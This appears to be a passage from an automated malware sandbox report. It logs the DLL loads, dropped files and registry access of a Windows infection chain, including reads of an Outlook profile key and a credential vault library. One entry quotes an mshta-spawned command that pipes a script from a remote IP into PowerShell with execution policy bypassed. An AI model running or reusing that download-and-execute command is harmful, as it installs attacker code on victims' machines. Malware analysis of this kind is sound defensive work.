            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: aclui.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Temp\Launcher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: C:\Windows\Temp\Launcher.exeWindow found: window name: SysTabControl32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Temp\Launcher.exeWindow detected: Number of UI elements: 24
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: OLEView.pdb source: Launcher.exe, Launcher.exe, 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Launcher.exe.5.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B5B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,6_2_00B5B905
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6F3B0 push ecx; ret 6_2_00B6F3C3
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6FDDD push ecx; ret 6_2_00B6FDF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B7636D push eax; ret 7_2_00B76381
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B73AD9 push ebx; retf 7_2_00B73ADA
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D9CAB2 push rdi; retf 0004h12_2_00007FF6F1D9CAB5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\io12j1es.2tm.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\io12j1es.2tm.exeJump to dropped file
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCC600 ExitProcess,OpenMutexA,ExitProcess,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DCC600

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
